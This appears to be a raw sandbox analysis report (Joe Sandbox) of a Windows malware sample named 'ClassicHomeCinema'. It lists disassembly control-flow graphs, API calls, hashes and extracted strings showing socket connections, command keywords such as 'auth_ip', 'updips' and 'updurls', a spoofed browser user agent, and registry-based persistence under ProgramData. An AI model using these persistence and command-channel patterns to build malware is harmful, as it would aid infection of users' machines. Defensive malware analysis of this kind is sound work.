ab3d7e call ab7336 818->823 819->815 831 ab65f9-ab661a call ab439c 819->831 841 ab668f-ab6698 call ac1f74 820->841 842 ab6650-ab665f call ac25e6 820->842 822->823 843 ab6b53-ab6b67 call ab7fff 823->843 844 ab69f1-ab6a33 call ab9721 823->844 831->820 853 ab67bb-ab67c8 841->853 854 ab669e-ab66b6 call ac27b5 841->854 842->841 855 ab6661 842->855 843->721 856 ab6a39-ab6a40 844->856 857 ab6b1d-ab6b4e call ab73e5 call ab33b2 844->857 853->721 866 ab66b8-ab66c0 call ab8733 854->866 867 ab66c2 854->867 859 ab6666-ab6678 call ac1850 855->859 861 ab6a43-ab6a48 856->861 857->843 873 ab667a 859->873 874 ab667d-ab668d call ac25e6 859->874 861->861 865 ab6a4a-ab6a8f call ab9721 861->865 865->857 879 ab6a95-ab6a9b 865->879 872 ab66c4-ab6768 call ab984b call ab3863 call ab5119 call ab3863 call ab9af1 call ab9c0b 866->872 867->872 899 ab676a call ab380b 872->899 900 ab676f-ab679a Sleep call ac08f0 872->900 873->874 874->841 874->859 880 ab6a9e-ab6aa3 879->880 880->880 883 ab6aa5-ab6ae0 call ab9721 880->883 883->857 889 ab6ae2-ab6b1c call abc113 883->889 889->857 899->900 904 ab679c-ab67a5 call ab4100 900->904 905 ab67a6-ab67b4 900->905 904->905 905->853 907 ab67b6 call ab380b 905->907 907->853
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.NTDLL(00AE4FD0), ref: 00AB649E
                                                                                        • RtlLeaveCriticalSection.NTDLL(00AE4FD0), ref: 00AB64AF
                                                                                        • _malloc.LIBCMT ref: 00AB6536
                                                                                        • RtlEnterCriticalSection.NTDLL(00AE4FD0), ref: 00AB6548
                                                                                        • RtlLeaveCriticalSection.NTDLL(00AE4FD0), ref: 00AB6554
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$_malloc
                                                                                        • String ID: <htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                        • API String ID: 362512214-1437582238
                                                                                        • Opcode ID: 9cef5c96be09e324a7633d4c8f7af415360ff5445f8160c22c5cb041e6b84835
                                                                                        • Instruction ID: d6d7a53be94a5bd16b5680ba18f95cc8fdc9ec4100c717698da30f788a724e2e
                                                                                        • Opcode Fuzzy Hash: 9cef5c96be09e324a7633d4c8f7af415360ff5445f8160c22c5cb041e6b84835
                                                                                        • Instruction Fuzzy Hash: E8C19832648381AFC721AB349D62BDF7BE8AF86B14F19051DF4869B393DB24C905C752

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00AB1D11
                                                                                        • GetLastError.KERNEL32 ref: 00AB1D23
                                                                                          • Part of subcall function 00AB1712: __EH_prolog.LIBCMT ref: 00AB1717
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00AB1D59
                                                                                        • GetLastError.KERNEL32 ref: 00AB1D6B
                                                                                        • __beginthreadex.LIBCMT ref: 00AB1DB1
                                                                                        • GetLastError.KERNEL32 ref: 00AB1DC6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AB1DDD
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AB1DEC
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00AB1E14
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AB1E1B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                        • String ID: thread$thread.entry_event$thread.exit_event
                                                                                        • API String ID: 831262434-3017686385
                                                                                        • Opcode ID: 8b4280c7fc31625e8178a827bb25c05a83486892777f9679f03451589dbd36b0
                                                                                        • Instruction ID: 197b28717db6aafadd9b1d3d0049768e4975032502c4b46aeb5737097f5107b0
                                                                                        • Opcode Fuzzy Hash: 8b4280c7fc31625e8178a827bb25c05a83486892777f9679f03451589dbd36b0
                                                                                        • Instruction Fuzzy Hash: FA315E71A007019FD700EF64C859BABBBA8EF84750F14496EF8558B292EB309D49CBD2

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00AB4D8B
                                                                                        • RtlEnterCriticalSection.NTDLL(00AE4FD0), ref: 00AB4DB7
                                                                                        • RtlLeaveCriticalSection.NTDLL(00AE4FD0), ref: 00AB4DC3
                                                                                          • Part of subcall function 00AB4BED: __EH_prolog.LIBCMT ref: 00AB4BF2
                                                                                          • Part of subcall function 00AB4BED: InterlockedExchange.KERNEL32(?,00000000), ref: 00AB4CF2
                                                                                        • RtlEnterCriticalSection.NTDLL(00AE4FD0), ref: 00AB4E93
                                                                                        • RtlLeaveCriticalSection.NTDLL(00AE4FD0), ref: 00AB4E99
                                                                                        • RtlEnterCriticalSection.NTDLL(00AE4FD0), ref: 00AB4EA0
                                                                                        • RtlLeaveCriticalSection.NTDLL(00AE4FD0), ref: 00AB4EA6
                                                                                        • RtlEnterCriticalSection.NTDLL(00AE4FD0), ref: 00AB50A7
                                                                                        • RtlLeaveCriticalSection.NTDLL(00AE4FD0), ref: 00AB50AD
                                                                                        • RtlEnterCriticalSection.NTDLL(00AE4FD0), ref: 00AB50B8
                                                                                        • RtlLeaveCriticalSection.NTDLL(00AE4FD0), ref: 00AB50C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                        • String ID:
                                                                                        • API String ID: 2062355503-0
                                                                                        • Opcode ID: 994f1ad32d2b3809a1e5f6f3e47b30abffb80c3a4fc42c86b592e050f5ff3b35
                                                                                        • Instruction ID: 5471921b7e6aaf35180663688f7d3078a2c469cba687206bbebd23ecc96c8b1e
                                                                                        • Opcode Fuzzy Hash: 994f1ad32d2b3809a1e5f6f3e47b30abffb80c3a4fc42c86b592e050f5ff3b35
                                                                                        • Instruction Fuzzy Hash: D5B18C71D0425DDFDF25DFA0D941BEEBBB8AF08314F10405AE405B6292DBB45A89CFA2

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1011 401301-40135e FindResourceA 1012 401360-401362 1011->1012 1013 401367-40137d SizeofResource 1011->1013 1014 401538-40153c 1012->1014 1015 401386-4013fe LoadResource LockResource GlobalAlloc call 402490 * 2 1013->1015 1016 40137f-401381 1013->1016 1021 401407-40140b 1015->1021 1016->1014 1022 40140d-40141d 1021->1022 1023 40141f-401428 GetTickCount 1021->1023 1022->1021 1025 401491-401499 1023->1025 1026 40142a-40142e 1023->1026 1029 4014a2-4014a8 1025->1029 1027 401430-401438 1026->1027 1028 40148f 1026->1028 1030 401441-401447 1027->1030 1031 4014f0-401525 GlobalAlloc call 401000 1028->1031 1029->1031 1032 4014aa-4014e8 1029->1032 1034 401449-401485 1030->1034 1035 40148d 1030->1035 1039 40152a-401535 1031->1039 1036 4014ea 1032->1036 1037 4014ee 1032->1037 1040 401487 1034->1040 1041 40148b 1034->1041 1035->1026 1036->1037 1037->1029 1039->1014 1040->1041 1041->1030
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                        • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3019604839-3916222277
                                                                                        • Opcode ID: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                        • Instruction ID: 779852d327d389dbbb2f1b261a2bb7141e3a4eae573781fe7d13a424a4f3f89b
                                                                                        • Opcode Fuzzy Hash: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                        • Instruction Fuzzy Hash: F1811075D04258DFDF01CFE8D985AEEBBB0BF09305F1400AAE581B7262C3385A84DB69

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1043 ab26db-ab2726 RtlEnterCriticalSection 1044 ab2728-ab2736 CreateWaitableTimerA 1043->1044 1045 ab277e-ab2781 1043->1045 1048 ab275b-ab2778 SetWaitableTimer 1044->1048 1049 ab2738-ab2756 GetLastError call abfb10 call ab1712 1044->1049 1046 ab2783-ab2798 call ac27b5 1045->1046 1047 ab27d5-ab27f0 RtlLeaveCriticalSection 1045->1047 1055 ab27ca 1046->1055 1056 ab279a-ab27ac call ac27b5 1046->1056 1048->1045 1049->1048 1058 ab27cc-ab27d0 call ab6dfe 1055->1058 1061 ab27b9 1056->1061 1062 ab27ae-ab27b7 1056->1062 1058->1047 1063 ab27bb-ab27c3 call ab1cf8 1061->1063 1062->1063 1065 ab27c8 1063->1065 1065->1058
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00AB2706
                                                                                        • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 00AB272B
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AD3163), ref: 00AB2738
                                                                                          • Part of subcall function 00AB1712: __EH_prolog.LIBCMT ref: 00AB1717
                                                                                        • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 00AB2778
                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00AB27D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                        • String ID: timer
                                                                                        • API String ID: 4293676635-1792073242
                                                                                        • Opcode ID: 9011f57a9f025ac06b6a81f38491db16d945d0b31617398787af0fc545bb7350
                                                                                        • Instruction ID: 30b46fc7f84c4b8c79231e9792bb9a3e86eb8a2255ea40e3b2706330875be1d4
                                                                                        • Opcode Fuzzy Hash: 9011f57a9f025ac06b6a81f38491db16d945d0b31617398787af0fc545bb7350
                                                                                        • Instruction Fuzzy Hash: BD31BEB1904705AFD310DF75C984B96BBECFB48761F004A2EF81683681DB70D845CB95

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1177 ab1ba7-ab1bcf call ad2a00 RtlEnterCriticalSection 1180 ab1be9-ab1bf7 RtlLeaveCriticalSection call abd32f 1177->1180 1181 ab1bd1 1177->1181 1184 ab1bfa-ab1c20 RtlEnterCriticalSection 1180->1184 1182 ab1bd4-ab1be0 call ab1b79 1181->1182 1187 ab1be2-ab1be7 1182->1187 1188 ab1c55-ab1c6e RtlLeaveCriticalSection 1182->1188 1186 ab1c34-ab1c36 1184->1186 1189 ab1c38-ab1c43 1186->1189 1190 ab1c22-ab1c2f call ab1b79 1186->1190 1187->1180 1187->1182 1192 ab1c45-ab1c4b 1189->1192 1190->1192 1195 ab1c31 1190->1195 1192->1188 1194 ab1c4d-ab1c51 1192->1194 1194->1188 1195->1186
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00AB1BAC
                                                                                        • RtlEnterCriticalSection.NTDLL ref: 00AB1BBC
                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 00AB1BEA
                                                                                        • RtlEnterCriticalSection.NTDLL ref: 00AB1C13
                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 00AB1C56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 1633115879-0
                                                                                        • Opcode ID: 20c627ce095fd45558d5a0eb1f22b9f7576112c4e91cefc4988b6a695d2a5d24
                                                                                        • Instruction ID: 5012af209e41c1e5b242b5b71cbc9da9433becb4e2ef1ad9867f2d6b06d727b4
                                                                                        • Opcode Fuzzy Hash: 20c627ce095fd45558d5a0eb1f22b9f7576112c4e91cefc4988b6a695d2a5d24
                                                                                        • Instruction Fuzzy Hash: E221BC75A00604DFCB14CF68C844B9ABBB8FF49315F10854AE81A97302D775ED05CBE0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1197 ab6bc2-ab6bcb 1198 ab6bcc-ab6bd1 1197->1198 1199 ab6bd3-ab6bd5 1198->1199 1200 ab6b65-ab6b67 1198->1200 1202 ab6c3b-ab6c4b 1199->1202 1203 ab6bd7-ab6be5 1199->1203 1201 ab60eb-ab60ed 1200->1201 1206 ab60ef-ab60f4 1201->1206 1207 ab60f6-ab60f8 1201->1207 1204 ab6c4d-ab6c4f 1202->1204 1205 ab6be6-ab6be8 1202->1205 1203->1205 1208 ab6c5a-ab6c61 1204->1208 1209 ab6c51-ab6c58 1204->1209 1213 ab6bea-ab6bf5 1205->1213 1214 ab6c11-ab6c1d 1205->1214 1212 ab60ff Sleep 1206->1212 1210 ab60fa 1207->1210 1211 ab6105-ab6134 RtlEnterCriticalSection RtlLeaveCriticalSection 1207->1211 1215 ab6c27 1208->1215 1209->1208 1210->1212 1216 ab6289-ab62b7 1211->1216 1212->1211 1213->1198 1217 ab6bf8-ab6c0f 1213->1217 1214->1215 1220 ab62b9-ab62bd 1216->1220 1217->1214 1222 ab632b-ab6331 1220->1222 1223 ab62bf-ab62c3 1220->1223 1224 ab6388-ab638b 1222->1224 1225 ab6332 1222->1225 1226 ab62c5 1223->1226 1228 ab638e-ab638f 1224->1228 1225->1224 1227 ab6334-ab633e 1225->1227 1226->1216 1229 ab62c7-ab62c9 1226->1229 1230 ab63b7-ab63c8 1227->1230 1231 ab636b-ab6372 1228->1231 1232 ab6391 1228->1232 1233 ab62ce-ab62d8 1229->1233 1234 ab63ca-ab63e0 1230->1234 1235 ab63e7 1230->1235 1236 ab63e1-ab63e4 1231->1236 1237 ab6374-ab6383 1231->1237 1238 ab6395-ab63a2 1232->1238 1233->1220 1239 ab62da-ab6304 1233->1239 1234->1236 1235->1228 1240 ab63e9-ab6443 1235->1240 1236->1235 1241 ab635a 1237->1241 1242 ab6385 1237->1242 1238->1238 1243 ab63a4-ab63b2 1238->1243 1239->1233 1247 ab6306-ab6315 1239->1247 1245 ab645f-ab6469 1240->1245 1246 ab6445-ab644b 1240->1246 1242->1224 1243->1230 1245->1201 1250 ab646f-ab6493 call ac3750 call ab439c 1245->1250 1248 ab644d-ab644f 1246->1248 1249 ab6451-ab645e call ab534d 1246->1249 1247->1226 1251 ab6317-ab6327 1247->1251 1248->1245 1249->1245 1250->1201 1258 ab6499-ab64c4 RtlEnterCriticalSection RtlLeaveCriticalSection call ac133c 1250->1258 1251->1222 1261 ab650e-ab6526 call ac133c 1258->1261 1262 ab64c6-ab64d5 call ac133c 1258->1262 1267 ab67cd-ab67dc call ac133c 1261->1267 1268 ab652c-ab652e 1261->1268 1262->1261 1269 ab64d7-ab64e6 call ac133c 1262->1269 1276 ab67de-ab67e0 1267->1276 1277 ab6821-ab6830 call ac133c 1267->1277 1268->1267 1271 ab6534-ab65df call ac1fac RtlEnterCriticalSection RtlLeaveCriticalSection call ac3750 * 5 call ab439c * 2 1268->1271 1269->1261 1279 ab64e8-ab64f7 call ac133c 1269->1279 1321 ab661c 1271->1321 1322 ab65e1-ab65e3 1271->1322 1276->1277 1280 ab67e2-ab681c call ac3750 RtlEnterCriticalSection RtlLeaveCriticalSection 1276->1280 1290 ab6832-ab6840 call ab5c0c call ab5d1a 1277->1290 1291 ab6845-ab6854 call ac133c 1277->1291 1279->1261 1292 ab64f9-ab6508 call ac133c 1279->1292 1280->1201 1290->1201 1291->1201 1301 ab685a-ab685c 1291->1301 1292->1201 1292->1261 1301->1201 1304 ab6862-ab687b call ab439c 1301->1304 1304->1201 1311 ab6881-ab6950 call ac1418 call ab1ba7 1304->1311 1323 ab6952 call ab143f 1311->1323 1324 ab6957-ab6978 RtlEnterCriticalSection 1311->1324 1326 ab6620-ab664e call ac1fac call ac3750 call ab439c 1321->1326 1322->1321 1325 ab65e5-ab65f7 call ac133c 1322->1325 1323->1324 1328 ab697a-ab6981 1324->1328 1329 ab6984-ab69eb RtlLeaveCriticalSection call ab3c67 call ab3d7e call ab7336 1324->1329 1325->1321 1337 ab65f9-ab661a call ab439c 1325->1337 1347 ab668f-ab6698 call ac1f74 1326->1347 1348 ab6650-ab665f call ac25e6 1326->1348 1328->1329 1349 ab6b53-ab6b67 call ab7fff 1329->1349 1350 ab69f1-ab6a33 call ab9721 1329->1350 1337->1326 1359 ab67bb-ab67c8 1347->1359 1360 ab669e-ab66b6 call ac27b5 1347->1360 1348->1347 1361 ab6661 1348->1361 1349->1201 1362 ab6a39-ab6a40 1350->1362 1363 ab6b1d-ab6b4e call ab73e5 call ab33b2 1350->1363 1359->1201 1372 ab66b8-ab66c0 call ab8733 1360->1372 1373 ab66c2 1360->1373 1365 ab6666-ab6678 call ac1850 1361->1365 1367 ab6a43-ab6a48 1362->1367 1363->1349 1379 ab667a 1365->1379 1380 ab667d-ab668d call ac25e6 1365->1380 1367->1367 1371 ab6a4a-ab6a8f call ab9721 1367->1371 1371->1363 1385 ab6a95-ab6a9b 1371->1385 1378 ab66c4-ab6768 call ab984b call ab3863 call ab5119 call ab3863 call ab9af1 call ab9c0b 1372->1378 1373->1378 1405 ab676a call ab380b 1378->1405 1406 ab676f-ab679a Sleep call ac08f0 1378->1406 1379->1380 1380->1347 1380->1365 1386 ab6a9e-ab6aa3 1385->1386 1386->1386 1389 ab6aa5-ab6ae0 call ab9721 1386->1389 1389->1363 1395 ab6ae2-ab6b1c call abc113 1389->1395 1395->1363 1405->1406 1410 ab679c-ab67a5 call ab4100 1406->1410 1411 ab67a6-ab67b4 1406->1411 1410->1411 1411->1359 1413 ab67b6 call ab380b 1411->1413 1413->1359
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(0000EA60), ref: 00AB60FF
                                                                                        • RtlEnterCriticalSection.NTDLL(00AE4FD0), ref: 00AB610A
                                                                                        • RtlLeaveCriticalSection.NTDLL(00AE4FD0), ref: 00AB611B
                                                                                        Strings
                                                                                        • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 00AB6124
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeaveSleep
                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                        • API String ID: 1566154052-1923541051
                                                                                        • Opcode ID: 268490d476457aa12ec8feab3549b22f19728a5ab365436089d02f94fe5f6206
                                                                                        • Instruction ID: 396fca99c941a6ab56df7b8298abd799f12fb85573dda6f74a237cf89dfdad22
                                                                                        • Opcode Fuzzy Hash: 268490d476457aa12ec8feab3549b22f19728a5ab365436089d02f94fe5f6206
                                                                                        • Instruction Fuzzy Hash: 51217932848B818FD321EF78EC066E17BB4FF1AB01B19049AE4C697557DA24A946CB91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1416 401da5-401da8 1417 401daa 1416->1417 1418 401e0b-401e16 1416->1418 1419 401d95-401d9d RegOpenKeyExA 1417->1419 1420 401dac-401dc9 1417->1420 1421 401f4e-40209b SetEvent 1418->1421 1423 401dd6-401ddd 1420->1423 1424 401dcb-40d5f4 1420->1424 1426 40dc3a-40dc4d 1421->1426 1423->1421 1424->1426 1428 40dc52 1426->1428 1428->1428
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: EventOpen
                                                                                        • String ID: 'l3k$.exe
                                                                                        • API String ID: 3658969616-2632659021
                                                                                        • Opcode ID: 91863bf70a53044422b0483ecfc40545a46aab5f930189fa63745c934b42f44f
                                                                                        • Instruction ID: 866a35bc240b9fc6576fee2ec2866792a1cd1e7454ba96a004f15cac11a8e27f
                                                                                        • Opcode Fuzzy Hash: 91863bf70a53044422b0483ecfc40545a46aab5f930189fa63745c934b42f44f
                                                                                        • Instruction Fuzzy Hash: 30115730608641CBE3119B209F443A737B8AB52341F6444BACC87F61A1C73C894A864E

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetVersion.KERNEL32 ref: 00402A46
                                                                                          • Part of subcall function 00403B64: HeapCreate.KERNEL32(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                          • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                        • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                          • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2057626494-0
                                                                                        • Opcode ID: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                        • Instruction ID: 5f87248e4510ca7a7a053da507506fe2897125482441b09741c869e2758f94b2
                                                                                        • Opcode Fuzzy Hash: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                        • Instruction Fuzzy Hash: BA214CB19006159ADB04AFA6DE49A6E7FA8EB04715F10413FF905BB2D1DB384900CA6C
                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00AB2EEE
                                                                                        • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00AB2EFD
                                                                                        • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00AB2F0C
                                                                                        • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 00AB2F36
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Socketsetsockopt
                                                                                        • String ID:
                                                                                        • API String ID: 2093263913-0
                                                                                        • Opcode ID: 706ea15e827e540c21b9f3a1edac479e71a11c61b847a7dcb78b46c10c915a79
                                                                                        • Instruction ID: 9549f4a47782ae6fded12a3c8962e805711f4f3521483d858c59b1bb750882f5
                                                                                        • Opcode Fuzzy Hash: 706ea15e827e540c21b9f3a1edac479e71a11c61b847a7dcb78b46c10c915a79
                                                                                        • Instruction Fuzzy Hash: 32018872A11204BFDB209FB5DC89B9B7BBCEB85771F008566F919CB151D67089008BA0
                                                                                        APIs
                                                                                          • Part of subcall function 00AB2D39: WSASetLastError.WS2_32(00000000), ref: 00AB2D47
                                                                                          • Part of subcall function 00AB2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00AB2D5C
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00AB2E6D
                                                                                        • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 00AB2E83
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Sendselect
                                                                                        • String ID: 3'
                                                                                        • API String ID: 2958345159-280543908
                                                                                        • Opcode ID: 3950b5c4d327cc7364793352cb0e09a75b51d95055cc31da38e17167a881ec9a
                                                                                        • Instruction ID: 85f29cbafc024a18c60cf48c846fde4ec8960eb4594acbce22dd76a5b379b342
                                                                                        • Opcode Fuzzy Hash: 3950b5c4d327cc7364793352cb0e09a75b51d95055cc31da38e17167a881ec9a
                                                                                        • Instruction Fuzzy Hash: 2431E1B0E102059FDF10DFA8C9267EEBBFDEF08394F04456AE80493243E77199518BA0
                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00AB2AEA
                                                                                        • connect.WS2_32(?,?,?), ref: 00AB2AF5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLastconnect
                                                                                        • String ID: 3'
                                                                                        • API String ID: 374722065-280543908
                                                                                        • Opcode ID: f3534f26fb5afebb502d7e86cc18771a0fe90884b925a1b8b3bdff2dd8488848
                                                                                        • Instruction ID: be9a85827030fb04694f2bcd08b0aa2e2a1c998f2be71115db7e44921d37e3bc
                                                                                        • Opcode Fuzzy Hash: f3534f26fb5afebb502d7e86cc18771a0fe90884b925a1b8b3bdff2dd8488848
                                                                                        • Instruction Fuzzy Hash: 8021C971E10204AFCF10EFA8D9257EEBBBDAF44360F14855AE81897283DB744A019B91
                                                                                        APIs
                                                                                        • RegSetValueExA.KERNEL32(?,classic_home_cinema_i56,00000000), ref: 004022EC
                                                                                        • RegCloseKey.KERNEL32(?), ref: 0040DC57
                                                                                        Strings
                                                                                        • C:\ProgramData\ClassicHomeCinema\ClassicHomeCinema.exe, xrefs: 0040235C, 0040D73B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseValue
                                                                                        • String ID: C:\ProgramData\ClassicHomeCinema\ClassicHomeCinema.exe
                                                                                        • API String ID: 3132538880-1803433813
                                                                                        • Opcode ID: 4641593bd5b9a3a0876b7d8202a09f3115f7eab90c517f239208f8895dcf671e
                                                                                        • Instruction ID: b1a5d16bc2ceaa1898fa32fc664c1ab5dfaf230487324fad3e5fab9b3683b2a9
                                                                                        • Opcode Fuzzy Hash: 4641593bd5b9a3a0876b7d8202a09f3115f7eab90c517f239208f8895dcf671e
                                                                                        • Instruction Fuzzy Hash: 3811E12190D6808FC7455B64AF60AA63BB4A706344F1511BFE586B72A3D67C080EEB5F
                                                                                        APIs
